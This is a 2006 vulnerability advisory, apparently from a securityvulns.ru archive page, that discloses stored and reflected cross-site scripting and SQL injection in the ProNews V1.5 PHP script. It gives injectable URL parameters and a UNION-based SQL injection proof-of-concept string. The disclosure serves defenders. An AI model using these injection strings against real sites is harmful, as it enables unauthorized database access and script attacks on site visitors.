Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  mxBB Module Profile Control Panel 0.91c Remote File Include Vulnerability

  [Full-disclosure] DadaIMC default configuration vulnerability

  AnnonceScriptHP V2.0  Multiple Vulnerabilities

  Messageriescripthp V2.0    XSS & SQL Injection

From:Mr_KaLiMaN <mr_kaliman_(at)_msn.com>
Date:10.12.2006
Subject:ProNews V1.5 XSS & SQL Injection

ProNews V1.5
--------------------
Vendor site: http://www.scripthp.com/
Product: ProNews V1.5
Vulnerability: XSS & SQL Injection Vulnerability
Credits: Mr_KaLiMaN
Reported to Vendor: 01.12.06
Public disclosure: 09.12.06

Description:
------------
XSS permanent:
http://[victim]/[script_news_path]/admin/change.
php?pseudo=[XSS]&email=">[XSS]&date=[XSS]&sujet=[XSS]&mes
sage=[XSS]&site=">[XSS]<foo
&lien=[XSS]&aa=[existing_news_id]


XSS non permanent:
http://[victim]/[script_news_path]/lire-avis.php?aa=[XSS]


SQL Injection Vulnerability:
http://[victim]/[script_news_path]/lire-avis.php?aa=[SQL INJECTION]
POC: http://[victim]/[script_news_path]/lire-avis.php?aa=1 UNION SELECT null,null,null,null,null FROM
[existing_table]--

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 



Rating@Mail.ru